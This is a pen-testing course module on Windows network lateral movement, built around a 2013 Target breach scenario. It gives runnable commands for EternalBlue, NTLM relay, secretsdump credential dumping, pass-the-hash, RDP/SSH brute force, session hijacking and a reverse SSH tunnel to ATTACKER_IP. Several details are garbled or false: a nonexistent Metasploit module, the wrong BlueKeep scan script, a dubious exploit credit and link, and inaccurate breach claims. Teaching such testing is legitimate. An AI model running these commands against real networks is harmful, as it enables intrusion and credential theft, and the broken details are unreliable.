Week 7: Network Penetration Testing

MITRE ATT&CK: Tactic — TA0008 (Lateral Movement), TA0004 (Privilege Escalation), Technique — T1021 (Remote Services)

Real-World Attack Scenario: The Target Network Breach (2013)

The 2013 Target breach is a textbook case of network pen testing failures:

1. Initial Access via HVAC Vendor: Stolen credentials from Fazio Mechanical Services (HVAC vendor)
2. Network Reconnaissance: Scanned Target's internal network; found vulnerable SMB on port 445
3. SMB Exploitation: Used stolen vendor credentials to access SMB shares
4. Lateral Movement via RDP: Used compromised credentials to access point-of-sale terminals
5. RAM Scraping: Installed malware on POS terminals to scrape card memory (track data)
6. Exfiltration: Sent 11GB of payment card data to external server over port 443
7. Detection Failure: FireEye alerts were ignored; no segmentation stopped the lateral movement

Key network attack techniques used:

• SMB (ports 445/139) — primary lateral movement vector
• RDP (port 3389) — POS terminal access
• DNS — exfiltration tunneling (queries to attacker DNS server encoded card data)
• Responder/LLLMNR poisoning — captured credentials on the internal network

Why this week matters: Target spent millions on perimeter security but had no network segmentation. Once attackers got inside the vendor network, they had access to everything. Network pen testing finds these gaps before attackers do.

Objectives

• Master network protocol attacks (SMB, FTP, SSH, RDP)
• Understand relay and capture attacks
• Perform lateral movement techniques
• Execute pass-the-hash, token manipulation

SMB Attacks

SMB Anatomy

Port: 445 (direct TCP)
Port: 139 (NetBIOS session)

Versions:
- SMBv1 (CIFS): Ancient, vulnerable to EternalBlue (MS17-010)
- SMBv2: Vista/2008, improved
- SMBv2.1: Windows 7/2008R2
- SMBv3: Windows 8/2012+, encrypted, faster

Default shares:
C$      - C:\ drive (admin only)
ADMIN$  - C:\Windows
IPC$    - Named pipes (null session)

Null Session / Anonymous Access

# Enumerate with null session
smbclient -L //10.0.0.5 -N
rpcclient -U "" -N 10.0.0.5
enum4linux -a 10.0.0.5

# In meterpreter
use auxiliary/scanner/smb/smb_enumusers

SMB Exploits

MS17-010 (EternalBlue)

# Detect
nmap --script=smb-vuln-ms17-010 10.0.0.5

# Exploit with Metasploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.0.0.5
set PAYLOAD windows/x64/meterpreter/bind_tcp
run

# Manual exploit (Fergiebix)
# https://github.com/iamongst/EternalBlue-Python

SMB Relay (ntlmrelayx)

# Instead of capturing, relay hashes to another target
# Requires SMB signing disabled on target

# Start responder (poison LLMNR/NBT-NS)
responder -I eth0

# In another terminal, relay
ntlmrelayx.py -tf targets.txt -smb2support

# Or relay to specific target
ntlmrelayx.py -t 10.0.0.6 -smb2support

# With WebDAV hook
ntlmrelayx.py -tf targets.txt -wh 10.0.0.4 -smb2support

impacket Toolkit

# GetNPUsers - AS-REP Roasting
python3 GetNPUsers.py DOMAIN/ -usersfile users.txt -format hashcat -outputfile hashes.txt
hashcat -m 18200 hashes.txt wordlist.txt

# GetADUsers
python3 GetADUsers.py -all DOMAIN/username:password

# GetUserSPNs - Kerberoasting
python3 GetUserSPNs.py DOMAIN/username:password -outputfile spn_hashes.txt

# secretsdump - Dumping NTDS.dit
python3 secretsdump.py DOMAIN/username:password@10.0.0.5

# smbexec - Execute commands via SMB
python3 smbexec.py DOMAIN/username:password@10.0.0.5

# wmiexec - Execute via WMI
python3 wmiexec.py DOMAIN/username:password@10.0.0.5

# psexec - PsExec via SMB (needs admin$ share)
python3 psexec.py DOMAIN/username:password@10.0.0.5

# lookupsid - Enumerate SIDs
python3 lookupsid.py DOMAIN/username:password@10.0.0.5

Pass-the-Hash

Why it Works

Windows authenticates via NTLM hash
If you have the hash, you can authenticate WITHOUT knowing the password
Works when NTLM authentication is used

Tools

# Metasploit
# After getting a Meterpreter shell
use post/windows/manage/hash_migrate

# Pass the hash directly
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:5f8c3b8c3e8c3...  # LM:NTLM format
# or using just NT hash
set SMBPass 5f8c3b8c3e8c3...:5f8c3b8c3e8c3...

# CrackMapExec (NetExec)
# Pass-the-hash
cme smb 10.0.0.5 -u administrator -H "aad3b435b51404eeaad3b435b51404ee:5f8c3b8c3e8c3..."

# Execute command
cme smb 10.0.0.5 -u administrator -H "hash" -x "whoami"

# Pass-the-ticket (Kerberos)
# Extract ticket from memory
# Use ticket on another system

RDP Attacks

Basic Enum & Exploits

# Port 3389
nmap -sV --script=rdp-enum-encryption,rdp-vuln-ms12-020 10.0.0.5

# BlueKeep (CVE-2019-0708)
nmap -p 3389 --script=rdp-vuln-ms12-020 10.0.0.5
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

Brute Force & Session Hijacking

# Hydra brute force
hydpa -l administrator -P passwords.txt rdp://10.0.0.5

# Crowbar
crowbar -b rdp -s 10.0.0.5/32 -u administrator -C passwords.txt

# Session hijacking (must be local admin)
# Get session IDs
query user
# Take over session
tscon 3 /dest:rdp-tcp#6

RDP Tunneling

# Through compromised host
# Local port forward
plink -L 3389:127.0.0.1:3389 user@10.0.0.5

# Remote port forward (from compromised)
plink -R 3389:127.0.0.1:3389 user@10.0.0.6

SSH Attacks

Basic Enum

# Banner grab
nc -nv 10.0.0.5 22
ssh -v 10.0.0.5

# Enum ciphers
nmap -p 22 --script=ssh2-enum-algos 10.0.0.5
ssh-audit 10.0.0.5

Brute Force

# Hydra
hydpa -l root -P wordlist.txt ssh://10.0.0.5

# Medusa
medusa -h 10.0.0.5 -u root -P wordlist.txt -M ssh

# With SSH key
ssh -i key.pem user@10.0.0.5

# Metasploit
use auxiliary/scanner/ssh/ssh_login

SSH Tunnels & Port Forwarding

# Local port forward (attacker machine)
# Access remote service via compromised host
ssh -L 4444:127.0.0.1:3306 user@10.0.0.5
# Now connect to localhost:4444 → goes through 10.0.0.5 to its localhost:3306

# Dynamic port forward (SOCKS proxy)
ssh -D 1080 user@10.0.0.5
# Configure browser to use 127.0.0.1:1080 as SOCKS proxy

# Remote port forward (from compromised)
# From 10.0.0.5, forward its port 80 to your local 8080
ssh -R 8080:127.0.0.1:80 user@ATTACKER_IP

# Proxy chains
# /etc/proxychains4.conf
proxychains nmap -sT -p 445 10.0.0.6

FTP Attacks

Basic Attacks

# Anonymous login
ftp 10.0.0.5
# user: anonymous
# pass: anonymous

# Banner grab
nc -nv 10.0.0.5 21

# Version detection
nmap -sV -p 21 10.0.0.5

# Common exploits
# VSFTPD 2.3.4 backdoor (CVE-2011-2523)
# ProFTPD 1.3.3c (mod_copy)

File Transfer on Compromised System

# Download files
smbclient //10.0.0.5/share -U user -W DOMAIN
# or
psexec.py DOMAIN/user:pass@10.0.0.5 "cmd /c type file.txt"

# Upload files
# Via SMB
cp evil.exe \\10.0.0.5\admin$\evil.exe
# or
smbclient //10.0.0.5/C$ -U admin
# put evil.exe

# Via FTP (if FTP server on target)
ftp attacker_ip
# from target: ftp 10.0.0.4
# put malicious.exe

Lateral Movement Summary

Technique	Port	Tool	Requirement
SMB Psexec	445	impacket, Metasploit	Admin share, credentials
WMI	135,445	wmiexec, CrackMapExec	Admin, WinRM
RDP	3389	xfreerdp, rdesktop	User creds
SSH	22	ssh, plink	Valid credentials
WinRM	5985/5986	evil-winrm	Admin creds
Pass-the-Hash	445	Mimikatz, CME	NT hash

Responder / LLMNR/NBT-NS Poisoning

Theory

When DNS fails, Windows broadcasts LLMNR/NBT-NS queries
Attacker poisons the response, captures NTLMv2 hash
Crack or relay the hash

Execution

# Edit responder.conf first
# Set SMB = On, HTTP = On

# Start responder
responder -I eth0 -dwv

# Wait for victim traffic
# Or force authentication
# Run on network with LLMNR/NBT-NS enabled

# In another terminal, relay
ntlmrelayx.py -tf targets.txt -smb2support

Practice Labs

Lab 1: SMB Relay Attack

# Setup: 2 VMs - Attacker (Kali), Victim (Win7)
# Victim must have SMB signing disabled

# On Kali - disable SMB signing for relay target
# Check: nmap -p 445 --script=smb2-security-mode 10.0.0.6

# Start responder
responder -I eth0

# Wait for victim to authenticate or force it
# In another terminal, run ntlmrelayx
ntlmrelayx.py -t 10.0.0.6 -smb2support

Lab 2: Pass-the-Hash with Mimikatz

# Get meterpreter shell on Windows
# Load mimikatz
load mimikatz

# Extract hashes
hashdump
# or in meterpreter
run post/windows/gather/hashdump

# Pass the hash
use exploit/windows/smb/psexec
set SMBUser Administrator
set SMBPass <NTLM_HASH>

Lab 3: Lateral Movement Chain

# Start with low-level access to 10.0.0.5 (Linux)
# Enumerate
netexec smb 10.0.0.6 -u user -p pass --sam
netexec smb 10.0.0.6 -u user -p pass -x "whoami"

# Pass the hash to Windows domain controller
netexec smb 10.0.0.7 -u administrator -H "hash" -x "whoami"

Key Takeaways

1. SMB signing — enable to prevent relay attacks
2. NTLM relay — capture and relay hashes between machines
3. Pass-the-hash — use hash without cracking; authenticate directly
4. SSH tunnels — pivot through compromised hosts
5. Lateral tools — impacket, CrackMapExec/NetExec, Metasploit
6. Defense — enable SMB signing, NTLM relay protections, strong passwords

Next Week Preview

Week 8 covers Wireless Security — WPA2 handshake capture, KRACK, Evil Twin attacks, and RF fundamentals for security testing.